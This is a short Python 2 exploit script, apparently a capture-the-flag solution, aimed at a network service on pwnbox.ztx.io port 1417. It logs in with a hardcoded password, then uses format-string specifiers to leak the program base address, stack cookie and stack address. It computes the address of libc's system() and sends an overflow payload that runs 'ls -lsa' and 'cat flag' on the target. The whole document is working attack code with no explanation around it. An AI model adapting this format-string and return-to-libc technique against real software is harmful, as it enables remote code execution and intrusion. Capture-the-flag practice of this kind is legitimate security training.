import socket
import struct

HOST = 'pwnbox.ztx.io'
PORT = 1417

# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.recv(1024)

# Log in
s.send("letmein\n")
s.recv(1024)

# Get base address, stack cookie, stack address
s.send("%79$08x %78$08x %10$08x " + "_" * 103 + "\n")
data = s.recv(1024)
base_address = int(data.split(" ")[0], 16) - 0xc10
stack_cookie = int(data.split(" ")[1], 16)
stack_address = int(data.split(" ")[2], 16) - 0x1a8

print "[*] Base address: %08x" % base_address
print "[*] Stack cookie: %08x" % stack_cookie
print "[*] Stack address: %08x" % stack_address

read_addr = base_address - 0xf5c60
sys_addr = read_addr - 0x9ef70
sys_addr_packed = struct.pack("<I", sys_addr)

print "[*] read@libc: %08x" % read_addr
print "[*] system@libc: %08x" % sys_addr

stack_addr_packed = struct.pack("<I", stack_address + 288)
stack_cookie_packed = struct.pack("<I", stack_cookie | 0x41)

payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____ls -lsa;##\n"
payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____cat flag;#\n"
s.send(payload % (stack_cookie_packed, sys_addr_packed, sys_addr_packed, stack_addr_packed))
print s.recv(1024)
print s.recv(1024)

for x in range(13):
    payload_2 = "%0134x " + "_" * 120 + "\n"
    s.send(payload_2)
    s.recv(1024)

print s.recv(1024)
